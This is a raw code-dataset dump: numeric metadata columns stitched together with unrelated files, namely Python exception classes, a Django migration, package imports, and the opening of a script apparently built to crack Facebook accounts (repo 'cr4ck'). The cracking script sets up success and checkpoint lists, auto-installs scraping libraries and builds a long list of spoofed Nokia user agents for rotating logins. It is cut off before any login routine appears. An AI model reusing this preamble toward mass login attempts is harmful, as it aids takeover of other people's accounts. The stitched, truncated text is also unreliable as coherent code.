| 108
| 0.652047
| 8,962
| 68,699
| 4.766793
| 0.015733
| 0.079588
| 0.135183
| 0.205337
| 0.979799
| 0.959621
| 0.905641
| 0.855056
| 0.764771
| 0.661119
| 0
| 0.028909
| 0.218533
| 68,699
| 1,398
| 109
| 49.140916
| 0.766829
| 0.015517
| 0
| 0.271908
| 0
| 0
| 0.015929
| 0
| 0
| 0
| 0
| 0
| 0.59869
| 1
| 0.027027
| false
| 0
| 0.018837
| 0.001638
| 0.048321
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
6c9eaa6bb0e41244f2a4c65b80f3f9f7209c6927
| 570
|
py
|
Python
|
pytorque/libs/errors.py
|
rauch/PyPBS
|
33037b9fb0f704d42d9b2f398cd887efd1158e16
|
[
"MIT"
] | 3
|
2016-09-28T12:33:23.000Z
|
2017-04-29T02:40:00.000Z
|
pytorque/libs/errors.py
|
rauch/PyPBS
|
33037b9fb0f704d42d9b2f398cd887efd1158e16
|
[
"MIT"
] | 1
|
2015-05-31T08:41:47.000Z
|
2015-05-31T08:41:47.000Z
|
pytorque/libs/errors.py
|
rauch/PyPBS
|
33037b9fb0f704d42d9b2f398cd887efd1158e16
|
[
"MIT"
] | 5
|
2015-01-26T02:43:57.000Z
|
2021-04-25T00:20:18.000Z
|
class ShellException(Exception):
def __init__(self, msg):
self._msg = msg
def __str__(self):
return repr(self._msg)
class ParseException(Exception):
def __init__(self, msg):
self._msg = msg
def __str__(self):
return repr(self._msg)
class TreeException(Exception):
def __init__(self, msg):
self._msg = msg
def __str__(self):
return repr(self._msg)
class AccessException(Exception):
def __init__(self, msg):
self._msg = msg
def __str__(self):
return repr(self._msg)
| 18.387097
| 33
| 0.624561
| 68
| 570
| 4.647059
| 0.191176
| 0.265823
| 0.202532
| 0.253165
| 0.806962
| 0.806962
| 0.806962
| 0.806962
| 0.806962
| 0.806962
| 0
| 0
| 0.270175
| 570
| 30
| 34
| 19
| 0.759615
| 0
| 0
| 0.8
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.4
| false
| 0
| 0
| 0.2
| 0.8
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 13
|
9f764a36792ac7971d122418a66cea501fbfb90d
| 1,821
|
py
|
Python
|
capstone/capdb/migrations/0086_auto_20191216_1803.py
|
rachelaus/capstone
|
2affa02706f9b1a99d032c66f258a7421c40a35e
|
[
"MIT"
] | 134
|
2017-07-12T17:03:06.000Z
|
2022-03-27T06:38:29.000Z
|
capstone/capdb/migrations/0086_auto_20191216_1803.py
|
rachelaus/capstone
|
2affa02706f9b1a99d032c66f258a7421c40a35e
|
[
"MIT"
] | 1,362
|
2017-06-22T17:42:49.000Z
|
2022-03-31T15:28:00.000Z
|
capstone/capdb/migrations/0086_auto_20191216_1803.py
|
rachelaus/capstone
|
2affa02706f9b1a99d032c66f258a7421c40a35e
|
[
"MIT"
] | 38
|
2017-06-22T14:46:23.000Z
|
2022-03-16T05:32:54.000Z
|
# Generated by Django 2.2.8 on 2019-12-16 18:03
import django.contrib.postgres.fields.jsonb
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('capdb', '0085_auto_20191211_1708'),
]
operations = [
migrations.AlterField(
model_name='casemetadata',
name='no_index_elided',
field=django.contrib.postgres.fields.jsonb.JSONField(blank=True, help_text='Elided text will be shown on click. Example: {"Text to elide (must be exact match)": "Extra text that\'s currently not used. Can be left as empty string."}', null=True),
),
migrations.AlterField(
model_name='casemetadata',
name='no_index_redacted',
field=django.contrib.postgres.fields.jsonb.JSONField(blank=True, help_text='Redacted text will be hidden from view and replaced with key\'s value specified above. Example: {"Text to redact (must be exact match)": "Text to replace redacted text."}', null=True),
),
migrations.AlterField(
model_name='historicalcasemetadata',
name='no_index_elided',
field=django.contrib.postgres.fields.jsonb.JSONField(blank=True, help_text='Elided text will be shown on click. Example: {"Text to elide (must be exact match)": "Extra text that\'s currently not used. Can be left as empty string."}', null=True),
),
migrations.AlterField(
model_name='historicalcasemetadata',
name='no_index_redacted',
field=django.contrib.postgres.fields.jsonb.JSONField(blank=True, help_text='Redacted text will be hidden from view and replaced with key\'s value specified above. Example: {"Text to redact (must be exact match)": "Text to replace redacted text."}', null=True),
),
]
| 52.028571
| 272
| 0.673806
| 234
| 1,821
| 5.162393
| 0.324786
| 0.029801
| 0.086921
| 0.111755
| 0.877483
| 0.850993
| 0.850993
| 0.850993
| 0.807119
| 0.807119
| 0
| 0.021739
| 0.216914
| 1,821
| 34
| 273
| 53.558824
| 0.825386
| 0.024712
| 0
| 0.714286
| 1
| 0.107143
| 0.348365
| 0.037768
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.071429
| 0
| 0.178571
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
4cc0e1ec8ecfb2bed241592acede35f1c828415a
| 270
|
py
|
Python
|
xfeat/optuna_selector/__init__.py
|
Drunkar/xfeat
|
7eced097072a67f06548cc778b27b2310c5e5511
|
[
"MIT"
] | 304
|
2020-06-19T05:00:14.000Z
|
2022-03-19T19:39:04.000Z
|
xfeat/optuna_selector/__init__.py
|
Drunkar/xfeat
|
7eced097072a67f06548cc778b27b2310c5e5511
|
[
"MIT"
] | 4
|
2020-06-28T11:30:33.000Z
|
2022-02-17T14:31:39.000Z
|
xfeat/optuna_selector/__init__.py
|
Drunkar/xfeat
|
7eced097072a67f06548cc778b27b2310c5e5511
|
[
"MIT"
] | 15
|
2020-06-19T08:34:56.000Z
|
2022-02-17T14:51:30.000Z
|
from xfeat.optuna_selector._kbest_explorer import KBestThresholdExplorer # NOQA
from xfeat.optuna_selector._gbdt_feature_explorer import GBDTFeatureExplorer # NOQA
from xfeat.optuna_selector._group_combination_explorer import ( # NOQA
GroupCombinationExplorer,
)
| 45
| 84
| 0.855556
| 29
| 270
| 7.586207
| 0.517241
| 0.122727
| 0.204545
| 0.313636
| 0.245455
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.1
| 270
| 5
| 85
| 54
| 0.90535
| 0.051852
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.6
| 0
| 0.6
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
4cd595047830d70da5bff180d908cd24121d24e8
| 148
|
py
|
Python
|
cellrank/tl/estimators/mixins/decomposition/__init__.py
|
WeilerP/cellrank
|
c8c2b9f6bd2448861fb414435aee7620ca5a0bad
|
[
"BSD-3-Clause"
] | 172
|
2020-03-19T19:50:53.000Z
|
2022-03-28T09:36:04.000Z
|
cellrank/tl/estimators/mixins/decomposition/__init__.py
|
WeilerP/cellrank
|
c8c2b9f6bd2448861fb414435aee7620ca5a0bad
|
[
"BSD-3-Clause"
] | 702
|
2020-03-19T08:09:04.000Z
|
2022-03-30T09:55:14.000Z
|
cellrank/tl/estimators/mixins/decomposition/__init__.py
|
WeilerP/cellrank
|
c8c2b9f6bd2448861fb414435aee7620ca5a0bad
|
[
"BSD-3-Clause"
] | 17
|
2020-04-07T03:11:02.000Z
|
2022-02-02T20:39:16.000Z
|
from cellrank.tl.estimators.mixins.decomposition._eigen import EigenMixin
from cellrank.tl.estimators.mixins.decomposition._schur import SchurMixin
| 49.333333
| 73
| 0.878378
| 18
| 148
| 7.111111
| 0.611111
| 0.1875
| 0.21875
| 0.375
| 0.671875
| 0.671875
| 0
| 0
| 0
| 0
| 0
| 0
| 0.054054
| 148
| 2
| 74
| 74
| 0.914286
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
4cea621dd013fc67bb97d9f75c40341c4bf13a7e
| 109,050
|
py
|
Python
|
orbxd.py
|
Recode24/cr4ck
|
264550c44487117ad01cb07bd88c156043eaefd7
|
[
"MIT"
] | null | null | null |
orbxd.py
|
Recode24/cr4ck
|
264550c44487117ad01cb07bd88c156043eaefd7
|
[
"MIT"
] | null | null | null |
orbxd.py
|
Recode24/cr4ck
|
264550c44487117ad01cb07bd88c156043eaefd7
|
[
"MIT"
] | null | null | null |
#coding=utf-8
#Open Source Code Syarat? Subrek Channel Gua & Jangan Ganti Bot Follow! Cukup Tambahkan Bot Follow Sajah!
# Ingat Ini Hanya Untuk Contoh Project!. Kalo Mau Recode, Recode Ajah Itung² Buat Latihan Lu
# Kalo Mau Izin, Izin lewat instgrm/email/fb Ajah
# insgrm : https://www.instagram.com/ngemry7
# email : xgansb@gmail.com
# fb : https://www.facebook.com/meyrina.setyaningrum
# Maaf klo codinganya berantakan dan banyak bug:)
import requests,bs4,sys,os,subprocess,getpass,hashlib
import random,time,re,json
import emailerendem,calendar,nande,orbxd
from datetime import datetime
from datetime import date
from concurrent.futures import ThreadPoolExecutor
from mechanize import Browser
from multiprocessing.pool import ThreadPool
from bs4 import BeautifulSoup as parser
from requests.exceptions import ConnectionError
from mechanize import Browser
if 'linux' in sys.platform.lower():
N = '\x1b[1;94m'
G = '\x1b[1;92m'
O = '\x1b[1;97m'
R = '\x1b[1;91m'
try:
import requests
except ImportError:
os.system('pip2 install requests')
else:
try:
import mechanize
except ImportError:
os.system('pip2 install mechanize')
else:
try:
import bs4
except ImportError:
os.system('pip2 install bs4')
def jalan(z):
for e in z + '\n':
sys.stdout.write(e)
sys.stdout.flush()
time.sleep(0.02)
p = "\033[1;37m"
o = "\033[1;36m"
m = "\033[1;91m"
h = "\033[1;32m"
loop = 0
id = []
ok = []
cp = []
ct = datetime.now()
n = ct.month
bulan = ["January", "February", "March", "April", "May", "June", "July", "August", "September", "October", "November", "December"]
try:
if n < 0 or n > 12:
exit()
nTemp = n - 1
except ValueError:
exit()
current = datetime.now()
ta = current.year
bu = current.month
ha = current.day
op = bulan[nTemp]
ahahahaha_kimochii_araaaaaa = random.choice(["Mozilla/5.0 (SymbianOS/9.4; Series60/5.0 Nokia5800d-1/60.0.003; Profile/MIDP-2.1 Configuration/CLDC-1.1 ) AppleWebKit/533.4 (KHTML, like Gecko) NokiaBrowser/7.3.1.33 Mobile Safari/533.4", "Mozilla/5.0 (Series40; NokiaX2-02/10.90; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/1.0.2.26.11", "Mozilla/5.0 (Symbian/3; Series60/5.3 NokiaE7-00/111.040.1511; Profile/MIDP-2.1 Configuration/CLDC-1.1 ) AppleWebKit/535.1 (KHTML, like Gecko) NokiaBrowser/8.3.1.4 Mobile Safari/535.1", "Mozilla/5.0 (SymbianOS/9.4; Series60/5.0 Nokia5230/51.0.002; Profile/MIDP-2.1 Configuration/CLDC-1.1 ) AppleWebKit/533.4 (KHTML, like Gecko) NokiaBrowser/7.3.1.33 Mobile Safari/533.4", "Mozilla/5.0 (Symbian/3; Series60/5.3 NokiaC6-01/111.040.1511; Profile/MIDP-2.1 Configuration/CLDC-1.1 ) AppleWebKit/535.1 (KHTML, like Gecko) NokiaBrowser/8.3.1.4 Mobile Safari/535.1", "Mozilla/5.0 (Series40; Nokia205.1/04.51; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/3.9.0.0.22", "Mozilla/5.0 (Series40; Nokia303/14.87; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/3.9.0.0.22", "Mozilla/5.0 (Symbian/3; Series60/5.3 Nokia500/111.021.0028; Profile/MIDP-2.1 Configuration/CLDC-1.1 ) AppleWebKit/535.1 (KHTML, like Gecko) NokiaBrowser/8.3.1.4 Mobile Safari/535.1", "Mozilla/5.0 (Series40; Nokia110/03.51; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/2.0.2.62.10", "Mozilla/5.0 (Series40; Nokia501/1.0; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/3.0.0.0.67", "Mozilla/5.0 (Series40; Nokia200/11.81; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/3.9.0.0.22", "Mozilla/5.0 (Series40; Nokia205/03.18; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/4.0.0.0.45", "Mozilla/5.0 (SymbianOS/9.4; Series60/5.0 NokiaC5-06/23.6.015; Profile/MIDP-2.1 Configuration/CLDC-1.1 ) AppleWebKit/533.4 (KHTML, like Gecko) NokiaBrowser/7.3.1.33 Mobile Safari/533.4", "Mozilla/5.0 (Series40; Nokia200/11.81; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/4.0.0.0.45", "Mozilla/5.0 (Series40; Nokia208/03.39; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/4.0.0.0.45", "Mozilla/5.0 (Series40; Nokia205/03.19; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/4.0.0.0.45", "Mozilla/5.0 (Series40; Nokia205.1/04.51; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/4.0.0.0.45", "Mozilla/5.0 (Series40; Nokia201/11.81; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/2.0.2.68.14", "Mozilla/5.0 (Series40; Nokia2700c-2/07.80; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/4.0.0.0.45", "Mozilla/5.0 (Series40; Nokia200/10.61; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/3.7.0.0.11", "Mozilla/5.0 (Series40; Nokia206/04.51; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/4.0.0.0.45", "Mozilla/5.0 (Series40; Nokia205/04.51; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/4.0.0.0.45", "Mozilla/5.0 (Series40; Nokia201/11.81; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/4.0.0.0.45", "Mozilla/5.0 (Series40; Nokia200/11.95; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/3.2.0.0.6", "Mozilla/5.0 (Series40; Nokia501/14.0.4/java_runtime_version=Nokia_Asha_1_2; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/4.0.0.0.45", "Mozilla/5.0 (Series40; Nokia205.3/03.19; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/4.0.0.0.45", "Mozilla/5.0 (Series40; Nokia200/11.56; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/2.0.1.62.6", "Mozilla/5.0 (Series40; Nokia303/14.87; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/4.0.0.0.45", "Mozilla/5.0 (Series40; Nokia114/03.47; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/4.0.0.0.45", "Mozilla/5.0 (Series40; Nokia311/03.81; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/2.2.0.0.31", "Mozilla/5.0 (Series40; Nokia2051/03.20; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/3.9.0.0.22", "Mozilla/5.0 (Series40; Nokia305/07.42; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/4.0.0.0.45", "Mozilla/5.0 (Series40; Nokia201/11.95; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/4.0.0.0.45", "Mozilla/5.0 (Symbian/3; Series60/5.3 NokiaN8-00/111.040.1511; Profile/MIDP-2.1 Configuration/CLDC-1.1 ) AppleWebKit/535.1 (KHTML, like Gecko) NokiaBrowser/8.3.1.4 Mobile Safari/535.1", "Mozilla/5.0 (SymbianOS/9.4; Series60/5.0 Nokia5233/51.1.002; Profile/MIDP-2.1 Configuration/CLDC-1.1 ) AppleWebKit/533.4 (KHTML, like Gecko) NokiaBrowser/7.3.1.33 Mobile Safari/533.4", "Mozilla/5.0 (Series40; Nokia206/04.52; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/3.9.0.0.22", "Mozilla/5.0 (Series40; Nokia206/04.52; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/4.0.0.0.45", "Mozilla/5.0 (Series40; Nokia5130c-2/07.95; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/2.3.0.0.49", "Mozilla/5.0 (Series40; Nokia305/05.92; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/3.9.0.0.22", "Mozilla/5.0 (Series40; Nokia200/10.61; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/3.7.0.0.11", "Mozilla/5.0 (Series40; Nokia206/04.51; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/4.0.0.0.45", "Mozilla/5.0 (Series40; Nokia200/10.60; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/4.0.0.0.45", "Mozilla/5.0 (Series40; Nokia110/03.47; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/3.9.0.0.22", "Mozilla/5.0 (Series40; NokiaX2-02/11.84; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/4.0.0.0.45", "Mozilla/5.0 (Series40; Nokia2055/03.20; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/3.9.0.0.22", "Mozilla/5.0 (Series40; Nokia112/03.28; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/4.0.0.0.45", "Mozilla/5.0 (Series40; Nokia110/03.33; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/4.0.0.0.45", "Mozilla/5.0 (Series40; NokiaX2-02/10.91; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/4.0.0.0.45", "Mozilla/5.0 (Series40; Nokia110/03.04; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/3.7.0.0.11", "Mozilla/5.0 (Series40; Nokia210/04.12; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/3.9.0.0.22", "Mozilla/5.0 (Series40; Nokia200/12.04; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/4.0.0.0.45", "Mozilla/5.0 (Series40; Nokia306/05.93; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/4.0.0.0.45", "Mozilla/5.0 (Series40; Nokia206/03.59; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/3.2.0.0.6", "Mozilla/5.0 (Series40; Nokia308/05.85; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/4.0.0.0.45", "Mozilla/5.0 (Series40; Nokia202/20.36; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/2.0.1.62.6", "Mozilla/5.0 (Series40; Nokia210.2/06.09; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/4.0.0.0.45", "Mozilla/5.0 (Series40; NokiaX2-01/08.70; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/4.0.0.0.45", "Mozilla/5.0 (Series40; NokiaC2-02/07.48; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/4.0.0.0.45", "Mozilla/5.0 (Series40; Nokia305/05.92; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/4.0.0.0.45", "Mozilla/5.0 (Series40; Nokia311/07.36; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/4.0.0.0.45", "Mozilla/5.0 (Series40; NokiaX2-00/04.80; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/3.9.0.0.22", "Mozilla/5.0 (Series40; Nokia200/11.95; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/4.0.0.0.45", "Mozilla/5.0 (Series40; Nokia305/05.92; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/2.3.0.0.49", "Mozilla/5.0 (Series40; Nokia205/03.18; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/4.0.1.0.1", "Mozilla/5.0 (Series40; Nokia302/14.53; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/4.0.0.0.45", "Mozilla/5.0 (Series40; Nokia110/03.51; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/4.0.0.0.45", "Mozilla/5.0 (Series40; Nokia305/07.42; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/2.3.0.0.54", "Mozilla/5.0 (Series40; Nokia302/14.78; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/4.0.0.0.45", "Mozilla/5.0 (Series40; NokiaX2-02/11.63; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/4.0.0.0.45", "Mozilla/5.0 (Series40; Nokia112/03.32; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/4.0.0.0.45", "Mozilla/5.0 (Series40; NokiaC2-00/03.82; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/4.0.1.0.1","Mozilla/5.0 (Series40; Nokia2055/03.20; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/4.0.0.0.45", "Mozilla/5.0 (SymbianOS/9.4; Series60/5.0 NokiaC5-03/21.0.003; Profile/MIDP-2.1 Configuration/CLDC-1.1 ) AppleWebKit/533.4 (KHTML, like Gecko) NokiaBrowser/7.3.1.30 Mobile Safari/533.4 3gpp-gba", "Mozilla/5.0 (Linux; Android 4.1.2; Nokia_X Build/JZO54K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/30.0.1599.82 Mobile Safari/537.36 NokiaBrowser/1.0.1.54", "Mozilla/5.0 (SymbianOS/9.4; Series60/5.0 NokiaX6-00/40.0.002; Profile/MIDP-2.1 Configuration/CLDC-1.1 ) AppleWebKit/533.4 (KHTML, like Gecko) NokiaBrowser/7.3.1.33 Mobile Safari/533.4", "Mozilla/5.0 (Series40; NokiaX2-01/08.63; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/2.3.0.0.49", "Mozilla/5.0 (Series40; NokiaX2-02/11.79; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/4.0.0.0.45", "Mozilla/5.0 (Series40; Nokia110/03.04; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/4.0.0.0.45", "Mozilla/5.0 (Series40; Nokia206/03.58; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/4.0.0.0.45", "Mozilla/5.0 (Series40; Nokia200/10.60; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/2.3.0.0.49", "Mozilla/5.0 (SymbianOS/9.4; Series60/5.0 NokiaC5-05/23.5.015; Profile/MIDP-2.1 Configuration/CLDC-1.1 ) AppleWebKit/533.4 (KHTML, like Gecko) NokiaBrowser/7.3.1.33 Mobile Safari/533.4", "Mozilla/5.0 (Series40; Nokia311/05.92; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/4.0.0.0.45", "Mozilla/5.0 (Series40; Nokia302/14.78; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/2.0.2.68.14", "Mozilla/5.0 (Series40; Nokia200/11.95; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/5.0.0.0.31", "Mozilla/5.0 (Series40; Nokia302/15.15; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/4.0.1.0.1", "Mozilla/5.0 (Series40; Nokia200/12.04; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/3.2.0.0.6", "Mozilla/5.0 (Series40; Nokia205/03.19; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/5.0.0.0.31", "Mozilla/5.0 (Series40; NokiaC2-03/07.48; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/5.0.0.0.31", "Mozilla/5.0 (Series40; Nokia202/20.36; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/3.9.0.0.22", "Mozilla/5.0 (Series40; Nokia200/11.56; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/3.1.0.0.62", "Mozilla/5.0 (Series40; Nokia205/03.18; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/3.1.0.0.62", "Mozilla/5.0 (Series40; Nokia311/05.92; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/5.0.0.0.31", "Mozilla/5.0 (Series40; Nokia311/03.90; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/5.0.0.0.31", "Mozilla/5.0 (Series40; Nokia202/20.28; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/3.2.0.0.6", "Mozilla/5.0 (Series40; Nokia200/10.60; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/3.9.0.0.22", "Mozilla/5.0 (Series40; Nokia112/03.51; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/5.0.0.0.31", "Mozilla/5.0 (Series40; Nokia200/11.95; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/4.0.1.0.1", "Mozilla/5.0 (Series40; Nokia206/04.51; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/5.0.0.0.31", "Mozilla/5.0 (Series40; Nokia202/20.28; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/5.0.0.0.31", "Mozilla/5.0 (Series40; NokiaC2-03/07.63; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/5.0.0.0.31", "Mozilla/5.0 (Series40; Nokia206/04.52; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/2.3.0.0.55", "Mozilla/5.0 (Series40; NokiaC2-02/07.66; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/5.0.0.0.31", "Mozilla/5.0 (Series40; Nokia200/11.81; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/2.3.0.0.49", "Mozilla/5.0 (Series40; Nokia206/04.51; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/3.9.0.0.22", "Mozilla/5.0 (Series40; Nokia200/10.58; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/1.0.2.26.11", "Mozilla/5.0 (Series40; Nokia114/03.51; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/5.0.0.0.31", "Mozilla/5.0 (Series40; Nokia200/11.81; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/5.0.0.0.31", "Mozilla/5.0 